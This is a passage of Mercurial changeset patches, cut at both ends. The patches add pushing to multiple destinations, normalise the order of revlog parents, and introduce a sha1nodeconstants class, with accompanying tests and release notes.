opts.get(b'force'), - revs=revs, - newbranch=opts.get(b'new_branch'), - bookmarks=opts.get(b'bookmark', ()), - publish=opts.get(b'publish'), - opargs=opargs, - ) - - result = not pushop.cgresult - - if pushop.bkresult is not None: - if pushop.bkresult == 2: - result = 2 - elif not result and pushop.bkresult: - result = 2 - finally: - other.close() + other.close() return result # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615351820 -3600 # Wed Mar 10 05:50:20 2021 +0100 # Node ID 066b8d8f75b873ecd1b8a1c4633c4a121c95d57d # Parent 25850879a215ee9cb8beea17eaddbfd737058837 push: allow to specify multiple destinations I end up needing that on a regular basis and it turn out to be very simple to implement. See documentation and test for details. Differential Revision: https://phab.mercurial-scm.org/D10161 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5623,11 +5623,11 @@ ), ] + remoteopts, - _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]'), + _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def push(ui, repo, dest=None, **opts): +def push(ui, repo, *dests, **opts): """push changes to the specified destination Push changesets from the local repository to the specified @@ -5663,6 +5663,9 @@ Please see :hg:`help urls` for important details about ``ssh://`` URLs. If DESTINATION is omitted, a default path will be used. + When passed multiple destinations, push will process them one after the + other, but stop should an error occur. + .. container:: verbose The --pushvars option sends strings to the server that become @@ -5706,7 +5709,12 @@ # if we try to push a deleted bookmark, translate it to null # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - if True: + + if not dests: + dests = [None] + some_pushed = False + result = 0 + for dest in dests: path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.ConfigError( @@ -5753,9 +5761,9 @@ c = repo[b'.'] subs = c.substate # only repos that are committed for s in sorted(subs): - result = c.sub(s).push(opts) - if result == 0: - return not result + sub_result = c.sub(s).push(opts) + if sub_result == 0: + return 1 finally: del repo._subtoppath @@ -5775,15 +5783,24 @@ opargs=opargs, ) - result = not pushop.cgresult + if pushop.cgresult == 0: + result = 1 + elif pushop.cgresult is not None: + some_pushed = True if pushop.bkresult is not None: if pushop.bkresult == 2: result = 2 elif not result and pushop.bkresult: result = 2 + + if result: + break + finally: other.close() + if result == 0 and not some_pushed: + result = 1 return result diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t --- a/tests/test-exchange-multi-source.t +++ b/tests/test-exchange-multi-source.t @@ -71,6 +71,9 @@ Test simple bare operation ========================== +pull +---- + $ hg clone main-repo test-repo-bare --rev 0 -U adding changesets adding manifests @@ -121,9 +124,90 @@ o A 0 +push +---- + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files (+2 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files (+2 heads) + pushing to ./branch-H-push + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files (+2 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 6 + | | + | o D 5 + |/ + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o G 7 + | + o F 6 + | + | o E 5 + | | + | o D 4 + | | + | | o H 3 + | |/ + | o C 2 + |/ + o B 1 + | + o A 0 + + $ rm -rf ./*-push + Test operation with a target ============================ +pull +---- + $ hg clone main-repo test-repo-rev --rev 0 -U adding changesets adding manifests @@ -199,6 +283,125 @@ o A 0 +push +---- + +We only push a specific branch with --rev + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + +Same push, but the first one is a no-op + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + Test with --update ================== # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1615396161 -3600 # Wed Mar 10 18:09:21 2021 +0100 # Node ID 49fd21f32695d885d730b56d91707c9059c6bd54 # Parent 066b8d8f75b873ecd1b8a1c4633c4a121c95d57d revlog: guarantee that p1 != null if a non-null parent exists This change does not affect the hashing (which already did this transformation), but can change the log output in the rare case where this behavior was observed in repositories. The change can simplify iteration code where regular changesets and merges are distinct branches. Differential Revision: https://phab.mercurial-scm.org/D10150 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -908,8 +908,10 @@ if rev == wdirrev: raise error.WdirUnsupported raise - - return entry[5], entry[6] + if entry[5] == nullrev: + return entry[6], entry[5] + else: + return entry[5], entry[6] # fast parentrevs(rev) where rev isn't filtered _uncheckedparentrevs = parentrevs @@ -930,7 +932,11 @@ def parents(self, node): i = self.index d = i[self.rev(node)] - return i[d[5]][7], i[d[6]][7] # map revisions to nodes inline + # inline node() to avoid function call overhead + if d[5] == nullid: + return i[d[6]][7], i[d[5]][7] + else: + return i[d[5]][7], i[d[6]][7] def chainlen(self, rev): return self._chaininfo(rev)[0] diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -26,6 +26,13 @@ == Backwards Compatibility Changes == + * In normal repositories, the first parent of a changeset is not null, + unless both parents are null (like the first changeset). Some legacy + repositories violate this condition. The revlog code will now + silentely swap the parents if this condition is tested. This can + change the output of `hg log` when explicitly asking for first or + second parent. + == Internal API Changes == diff --git a/tests/test-narrow-shallow-merges.t b/tests/test-narrow-shallow-merges.t --- a/tests/test-narrow-shallow-merges.t +++ b/tests/test-narrow-shallow-merges.t @@ -179,7 +179,7 @@ $ hg log -T '{if(ellipsis,"...")}{node|short} {p1node|short} {p2node|short} {desc}\n' | sort - ...2a20009de83e 000000000000 3ac1f5779de3 outside 10 + ...2a20009de83e 3ac1f5779de3 000000000000 outside 10 ...3ac1f5779de3 bb96a08b062a 465567bdfb2d merge a/b/c/d 9 ...8d874d57adea 7ef88b4dd4fa 000000000000 outside 12 ...b844052e7b3b 000000000000 000000000000 outside 2c # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610550898 -3600 # Wed Jan 13 16:14:58 2021 +0100 # Node ID 6266d19556ad186f81caf3e892148a993428c407 # Parent 49fd21f32695d885d730b56d91707c9059c6bd54 node: introduce nodeconstants class In preparing for moving from SHA1 hashes to a modern hash function, place nullid and other constant magic vules in a class. Provide the active set of constants in the repository and push it down. Provide nullid directly in strategic places like the repository as it is accessed very often. This changeset introduces the API change, but not the mechanical replacement of the node.py attributes itself. Differential Revision: https://phab.mercurial-scm.org/D9750 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -3672,7 +3672,7 @@ Result is the number of markers in the repo.""" timer, fm = gettimer(ui) svfs = getsvfs(repo) - timer(lambda: len(obsolete.obsstore(svfs))) + timer(lambda: len(obsolete.obsstore(repo, svfs))) fm.end() diff --git a/hgext/absorb.py b/hgext/absorb.py --- a/hgext/absorb.py +++ b/hgext/absorb.py @@ -102,6 +102,9 @@ class emptyfilecontext(object): """minimal filecontext representing an empty file""" + def __init__(self, repo): + self._repo = repo + def data(self): return b'' @@ -212,7 +215,7 @@ if path in pctx: fctxs.append(pctx[path]) else: - fctxs.append(emptyfilecontext()) + fctxs.append(emptyfilecontext(pctx.repo())) fctxs.reverse() # note: we rely on a property of hg: filerev is not reused for linear diff --git a/hgext/git/gitlog.py b/hgext/git/gitlog.py --- a/hgext/git/gitlog.py +++ b/hgext/git/gitlog.py @@ -8,6 +8,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, wdirhex, ) from mercurial import ( @@ -422,6 +423,8 @@ class manifestlog(baselog): + nodeconstants = sha1nodeconstants + def __getitem__(self, node): return self.get(b'', node) diff --git a/hgext/largefiles/lfutil.py b/hgext/largefiles/lfutil.py --- a/hgext/largefiles/lfutil.py +++ b/hgext/largefiles/lfutil.py @@ -206,6 +206,7 @@ repo.root, repo.dirstate._validate, lambda: sparse.matcher(repo), + repo.nodeconstants, ) # If the largefiles dirstate does not exist, populate and create diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -54,6 +54,7 @@ from mercurial.node import ( nullid, nullrev, + sha1nodeconstants, short, ) from mercurial.thirdparty import attr @@ -305,6 +306,7 @@ """Implements storage for an individual tracked path.""" def __init__(self, db, path, compression): + self.nullid = sha1nodeconstants.nullid self._db = db self._path = path diff --git a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -623,7 +623,7 @@ _binaryentry = struct.Struct(b'>20sH') -def binaryencode(bookmarks): +def binaryencode(repo, bookmarks): """encode a '(bookmark, node)' iterable into a binary stream the binary format is: @@ -645,7 +645,7 @@ return b''.join(binarydata) -def binarydecode(stream): +def binarydecode(repo, stream): """decode a binary stream into an '(bookmark, node)' iterable the binary format is: diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -97,7 +97,7 @@ revs.extend(r for r in extrarevs if r <= bcache.tiprev) else: # nothing to fall back on, start empty. - bcache = branchcache() + bcache = branchcache(repo) revs.extend(cl.revs(start=bcache.tiprev + 1)) if revs: @@ -129,6 +129,7 @@ if rbheads: rtiprev = max((int(clrev(node)) for node in rbheads)) cache = branchcache( + repo, remotebranchmap, repo[rtiprev].node(), rtiprev, @@ -184,6 +185,7 @@ def __init__( self, + repo, entries=(), tipnode=nullid, tiprev=nullrev, @@ -195,6 +197,7 @@ """hasnode is a function which can be used to verify whether changelog has a given node or not. If it's not provided, we assume that every node we have exists in changelog""" + self._repo = repo self.tipnode = tipnode self.tiprev = tiprev self.filteredhash = filteredhash @@ -280,6 +283,7 @@ if len(cachekey) > 2: filteredhash = bin(cachekey[2]) bcache = cls( + repo, tipnode=last, tiprev=lrev, filteredhash=filteredhash, @@ -388,6 +392,7 @@ def copy(self): """return an deep copy of the branchcache object""" return type(self)( + self._repo, self._entries, self.tipnode, self.tiprev, diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2146,7 +2146,7 @@ contains binary encoded (bookmark, node) tuple. If the local state does not marks the one in the part, a PushRaced exception is raised """ - bookdata = bookmarks.binarydecode(inpart) + bookdata = bookmarks.binarydecode(op.repo, inpart) msgstandard = ( b'remote repository changed while pushing - please try again ' @@ -2376,7 +2376,7 @@ When mode is 'records', the information is recorded into the 'bookmarks' records of the bundle operation. This behavior is suitable for pulling. """ - changes = bookmarks.binarydecode(inpart) + changes = bookmarks.binarydecode(op.repo, inpart) pushkeycompat = op.repo.ui.configbool( b'server', b'bookmarks-pushkey-compat' diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -175,9 +175,15 @@ class bundlemanifest(bundlerevlog, manifest.manifestrevlog): def __init__( - self, opener, cgunpacker, linkmapper, dirlogstarts=None, dir=b'' + self, + nodeconstants, + opener, + cgunpacker, + linkmapper, + dirlogstarts=None, + dir=b'', ): - manifest.manifestrevlog.__init__(self, opener, tree=dir) + manifest.manifestrevlog.__init__(self, nodeconstants, opener, tree=dir) bundlerevlog.__init__( self, opener, self.indexfile, cgunpacker, linkmapper ) @@ -192,6 +198,7 @@ if d in self._dirlogstarts: self.bundle.seek(self._dirlogstarts[d]) return bundlemanifest( + self.nodeconstants, self.opener, self.bundle, self._linkmapper, @@ -368,7 +375,9 @@ # consume the header if it exists self._cgunpacker.manifestheader() linkmapper = self.unfiltered().changelog.rev - rootstore = bundlemanifest(self.svfs, self._cgunpacker, linkmapper) + rootstore = bundlemanifest( + self.nodeconstants, self.svfs, self._cgunpacker, linkmapper + ) self.filestart = self._cgunpacker.tell() return manifest.manifestlog( diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -662,7 +662,7 @@ return readexactly(self._fh, n) -def _revisiondeltatochunks(delta, headerfn): +def _revisiondeltatochunks(repo, delta, headerfn): """Serialize a revisiondelta to changegroup chunks.""" # The captured revision delta may be encoded as a delta against @@ -1065,7 +1065,9 @@ sidedata_helpers=sidedata_helpers, ) for delta in deltas: - for chunk in _revisiondeltatochunks(delta, self._builddeltaheader): + for chunk in _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ): size += len(chunk) yield chunk @@ -1121,7 +1123,9 @@ yield chunk for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk @@ -1160,7 +1164,9 @@ yield h for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -191,7 +191,7 @@ # Extensions might modify _defaultextra, so let the constructor below pass # it in extra = attr.ib() - manifest = attr.ib(default=nullid) + manifest = attr.ib() user = attr.ib(default=b'') date = attr.ib(default=(0, 0)) files = attr.ib(default=attr.Factory(list)) @@ -219,9 +219,9 @@ '_changes', ) - def __new__(cls, text, sidedata, cpsd): + def __new__(cls, cl, text, sidedata, cpsd): if not text: - return _changelogrevision(extra=_defaultextra) + return _changelogrevision(extra=_defaultextra, manifest=nullid) self = super(changelogrevision, cls).__new__(cls) # We could return here and implement the following as an __init__. @@ -526,7 +526,7 @@ """ d, s = self._revisiondata(nodeorrev) c = changelogrevision( - d, s, self._copiesstorage == b'changeset-sidedata' + self, d, s, self._copiesstorage == b'changeset-sidedata' ) return (c.manifest, c.user, c.date, c.files, c.description, c.extra) @@ -534,7 +534,7 @@ """Obtain a ``changelogrevision`` for a node or revision.""" text, sidedata = self._revisiondata(nodeorrev) return changelogrevision( - text, sidedata, self._copiesstorage == b'changeset-sidedata' + self, text, sidedata, self._copiesstorage == b'changeset-sidedata' ) def readfiles(self, nodeorrev): diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -73,13 +73,16 @@ @interfaceutil.implementer(intdirstate.idirstate) class dirstate(object): - def __init__(self, opener, ui, root, validate, sparsematchfn): + def __init__( + self, opener, ui, root, validate, sparsematchfn, nodeconstants + ): """Create a new dirstate object. opener is an open()-like callable that can be used to open the dirstate file; root is the root of the directory tracked by the dirstate. """ + self._nodeconstants = nodeconstants self._opener = opener self._validate = validate self._root = root @@ -136,7 +139,9 @@ @propertycache def _map(self): """Return the dirstate contents (see documentation for dirstatemap).""" - self._map = self._mapcls(self._ui, self._opener, self._root) + self._map = self._mapcls( + self._ui, self._opener, self._root, self._nodeconstants + ) return self._map @property @@ -1420,12 +1425,13 @@ denormalized form that they appear as in the dirstate. """ - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): self._ui = ui self._opener = opener self._root = root self._filename = b'dirstate' self._nodelen = 20 + self._nodeconstants = nodeconstants self._parents = None self._dirtyparents = False @@ -1724,7 +1730,8 @@ if rustmod is not None: class dirstatemap(object): - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): + self._nodeconstants = nodeconstants self._ui = ui self._opener = opener self._root = root diff --git a/mercurial/discovery.py b/mercurial/discovery.py --- a/mercurial/discovery.py +++ b/mercurial/discovery.py @@ -270,9 +270,12 @@ # C. Update newmap with outgoing changes. # This will possibly add new heads and remove existing ones. newmap = branchmap.remotebranchcache( - (branch, heads[1]) - for branch, heads in pycompat.iteritems(headssum) - if heads[0] is not None + repo, + ( + (branch, heads[1]) + for branch, heads in pycompat.iteritems(headssum) + if heads[0] is not None + ), ) newmap.update(repo, (ctx.rev() for ctx in missingctx)) for branch, newheads in pycompat.iteritems(newmap): diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -827,7 +827,7 @@ data = [] for book, old, new in pushop.outbookmarks: data.append((book, old)) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'check:bookmarks', data=checkdata) @@ -1027,7 +1027,7 @@ _abortonsecretctx(pushop, new, book) data.append((book, new)) allactions.append((book, _bmaction(old, new))) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'bookmarks', data=checkdata) def handlereply(op): @@ -2455,7 +2455,7 @@ if not b2caps or b'bookmarks' not in b2caps: raise error.Abort(_(b'no common bookmarks exchange method')) books = bookmod.listbinbookmarks(repo) - data = bookmod.binaryencode(books) + data = bookmod.binaryencode(repo, books) if data: bundler.newpart(b'bookmarks', data=data) diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -33,6 +33,7 @@ # Used by LFS. self._revlog.filename = path self._revlog.revlog_kind = b'filelog' + self.nullid = self._revlog.nullid def __len__(self): return len(self._revlog) diff --git a/mercurial/interfaces/dirstate.py b/mercurial/interfaces/dirstate.py --- a/mercurial/interfaces/dirstate.py +++ b/mercurial/interfaces/dirstate.py @@ -8,7 +8,7 @@ class idirstate(interfaceutil.Interface): - def __init__(opener, ui, root, validate, sparsematchfn): + def __init__(opener, ui, root, validate, sparsematchfn, nodeconstants): """Create a new dirstate object. opener is an open()-like callable that can be used to open the diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -523,6 +523,10 @@ * Metadata to facilitate storage. """ + nullid = interfaceutil.Attribute( + """node for the null revision for use as delta base.""" + ) + def __len__(): """Obtain the number of revisions stored for this file.""" @@ -1143,6 +1147,10 @@ class imanifeststorage(interfaceutil.Interface): """Storage interface for manifest data.""" + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + tree = interfaceutil.Attribute( """The path to the directory this manifest tracks. @@ -1366,6 +1374,10 @@ tree manifests. """ + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + def __getitem__(node): """Obtain a manifest instance for a given binary node. @@ -1434,6 +1446,13 @@ This currently captures the reality of things - not how things should be. """ + nodeconstants = interfaceutil.Attribute( + """Constant nodes matching the hash function used by the repository.""" + ) + nullid = interfaceutil.Attribute( + """null revision for the hash function used by the repository.""" + ) + supportedformats = interfaceutil.Attribute( """Set of requirements that apply to stream clone. diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -21,6 +21,7 @@ hex, nullid, nullrev, + sha1nodeconstants, short, ) from .pycompat import ( @@ -1330,6 +1331,8 @@ self.vfs = hgvfs self.path = hgvfs.base self.requirements = requirements + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid self.supported = supportedrequirements self.sharedpath = sharedpath self.store = store @@ -1676,7 +1679,12 @@ sparsematchfn = lambda: sparse.matcher(self) return dirstate.dirstate( - self.vfs, self.ui, self.root, self._dirstatevalidate, sparsematchfn + self.vfs, + self.ui, + self.root, + self._dirstatevalidate, + sparsematchfn, + self.nodeconstants, ) def _dirstatevalidate(self, node): diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -792,8 +792,9 @@ @interfaceutil.implementer(repository.imanifestdict) class treemanifest(object): - def __init__(self, dir=b'', text=b''): + def __init__(self, nodeconstants, dir=b'', text=b''): self._dir = dir + self.nodeconstants = nodeconstants self._node = nullid self._loadfunc = _noop self._copyfunc = _noop @@ -1051,7 +1052,9 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].__setitem__(subpath, n) else: # manifest nodes are either 20 bytes or 32 bytes, @@ -1078,14 +1081,16 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].setflag(subpath, flags) else: self._flags[f] = flags self._dirty = True def copy(self): - copy = treemanifest(self._dir) + copy = treemanifest(self.nodeconstants, self._dir) copy._node = self._node copy._dirty = self._dirty if self._copyfunc is _noop: @@ -1215,7 +1220,7 @@ visit = match.visitchildrenset(self._dir[:-1]) if visit == b'all': return self.copy() - ret = treemanifest(self._dir) + ret = treemanifest(self.nodeconstants, self._dir) if not visit: return ret @@ -1272,7 +1277,7 @@ m2 = m2._matches(match) return m1.diff(m2, clean=clean) result = {} - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def _iterativediff(t1, t2, stack): """compares two tree manifests and append new tree-manifests which @@ -1368,7 +1373,7 @@ self._load() # for consistency; should never have any effect here m1._load() m2._load() - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def getnode(m, d): ld = m._lazydirs.get(d) @@ -1551,6 +1556,7 @@ def __init__( self, + nodeconstants, opener, tree=b'', dirlogcache=None, @@ -1567,6 +1573,7 @@ option takes precedence, so if it is set to True, we ignore whatever value is passed in to the constructor. """ + self.nodeconstants = nodeconstants # During normal operations, we expect to deal with not more than four # revs at a time (such as during commit --amend). When rebasing large # stacks of commits, the number can go up, hence the config knob below. @@ -1654,7 +1661,11 @@ assert self._treeondisk if d not in self._dirlogcache: mfrevlog = manifestrevlog( - self.opener, d, self._dirlogcache, treemanifest=self._treeondisk + self.nodeconstants, + self.opener, + d, + self._dirlogcache, + treemanifest=self._treeondisk, ) self._dirlogcache[d] = mfrevlog return self._dirlogcache[d] @@ -1917,6 +1928,7 @@ they receive (i.e. tree or flat or lazily loaded, etc).""" def __init__(self, opener, repo, rootstore, narrowmatch): + self.nodeconstants = repo.nodeconstants usetreemanifest = False cachesize = 4 @@ -1955,7 +1967,7 @@ if not self._narrowmatch.always(): if not self._narrowmatch.visitdir(tree[:-1]): - return excludeddirmanifestctx(tree, node) + return excludeddirmanifestctx(self.nodeconstants, tree, node) if tree: if self._rootstore._treeondisk: if verify: @@ -2118,7 +2130,7 @@ def __init__(self, manifestlog, dir=b''): self._manifestlog = manifestlog self._dir = dir - self._treemanifest = treemanifest() + self._treemanifest = treemanifest(manifestlog.nodeconstants) def _storage(self): return self._manifestlog.getstorage(b'') @@ -2168,17 +2180,19 @@ narrowmatch = self._manifestlog._narrowmatch if not narrowmatch.always(): if not narrowmatch.visitdir(self._dir[:-1]): - return excludedmanifestrevlog(self._dir) + return excludedmanifestrevlog( + self._manifestlog.nodeconstants, self._dir + ) return self._manifestlog.getstorage(self._dir) def read(self): if self._data is None: store = self._storage() if self._node == nullid: - self._data = treemanifest() + self._data = treemanifest(self._manifestlog.nodeconstants) # TODO accessing non-public API elif store._treeondisk: - m = treemanifest(dir=self._dir) + m = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) def gettext(): return store.revision(self._node) @@ -2198,7 +2212,9 @@ text = store.revision(self._node) arraytext = bytearray(text) store.fulltextcache[self._node] = arraytext - self._data = treemanifest(dir=self._dir, text=text) + self._data = treemanifest( + self._manifestlog.nodeconstants, dir=self._dir, text=text + ) return self._data @@ -2235,7 +2251,7 @@ r0 = store.deltaparent(store.rev(self._node)) m0 = self._manifestlog.get(self._dir, store.node(r0)).read() m1 = self.read() - md = treemanifest(dir=self._dir) + md = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) for f, ((n0, fl0), (n1, fl1)) in pycompat.iteritems(m0.diff(m1)): if n1: md[f] = n1 @@ -2278,8 +2294,8 @@ whose contents are unknown. """ - def __init__(self, dir, node): - super(excludeddir, self).__init__(dir) + def __init__(self, nodeconstants, dir, node): + super(excludeddir, self).__init__(nodeconstants, dir) self._node = node # Add an empty file, which will be included by iterators and such, # appearing as the directory itself (i.e. something like "dir/") @@ -2298,12 +2314,13 @@ class excludeddirmanifestctx(treemanifestctx): """context wrapper for excludeddir - see that docstring for rationale""" - def __init__(self, dir, node): + def __init__(self, nodeconstants, dir, node): + self.nodeconstants = nodeconstants self._dir = dir self._node = node def read(self): - return excludeddir(self._dir, self._node) + return excludeddir(self.nodeconstants, self._dir, self._node) def readfast(self, shallow=False): # special version of readfast since we don't have underlying storage @@ -2325,7 +2342,8 @@ outside the narrowspec. """ - def __init__(self, dir): + def __init__(self, nodeconstants, dir): + self.nodeconstants = nodeconstants self._dir = dir def __len__(self): diff --git a/mercurial/node.py b/mercurial/node.py --- a/mercurial/node.py +++ b/mercurial/node.py @@ -21,29 +21,48 @@ raise TypeError(e) -nullrev = -1 -# In hex, this is '0000000000000000000000000000000000000000' -nullid = b"\0" * 20 -nullhex = hex(nullid) +def short(node): + return hex(node[:6]) + -# Phony node value to stand-in for new files in some uses of -# manifests. -# In hex, this is '2121212121212121212121212121212121212121' -newnodeid = b'!!!!!!!!!!!!!!!!!!!!' -# In hex, this is '3030303030303030303030303030306164646564' -addednodeid = b'000000000000000added' -# In hex, this is '3030303030303030303030306d6f646966696564' -modifiednodeid = b'000000000000modified' +nullrev = -1 -wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} - -# pseudo identifiers for working directory -# (they are experimental, so don't add too many dependencies on them) +# pseudo identifier for working directory +# (experimental, so don't add too many dependencies on it) wdirrev = 0x7FFFFFFF -# In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' -wdirid = b"\xff" * 20 -wdirhex = hex(wdirid) -def short(node): - return hex(node[:6]) +class sha1nodeconstants(object): + nodelen = 20 + + # In hex, this is '0000000000000000000000000000000000000000' + nullid = b"\0" * nodelen + nullhex = hex(nullid) + + # Phony node value to stand-in for new files in some uses of + # manifests. + # In hex, this is '2121212121212121212121212121212121212121' + newnodeid = b'!!!!!!!!!!!!!!!!!!!!' + # In hex, this is '3030303030303030303030303030306164646564' + addednodeid = b'000000000000000added' + # In hex, this is '3030303030303030303030306d6f646966696564' + modifiednodeid = b'000000000000modified' + + wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} + + # pseudo identifier for working directory + # (experimental, so don't add too many dependencies on it) + # In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' + wdirid = b"\xff" * nodelen + wdirhex = hex(wdirid) + + +# legacy starting point for porting modules +nullid = sha1nodeconstants.nullid +nullhex = sha1nodeconstants.nullhex +newnodeid = sha1nodeconstants.newnodeid +addednodeid = sha1nodeconstants.addednodeid +modifiednodeid = sha1nodeconstants.modifiednodeid +wdirfilenodeids = sha1nodeconstants.wdirfilenodeids +wdirid = sha1nodeconstants.wdirid +wdirhex = sha1nodeconstants.wdirhex diff --git a/mercurial/obsolete.py b/mercurial/obsolete.py --- a/mercurial/obsolete.py +++ b/mercurial/obsolete.py @@ -560,10 +560,11 @@ # parents: (tuple of nodeid) or None, parents of 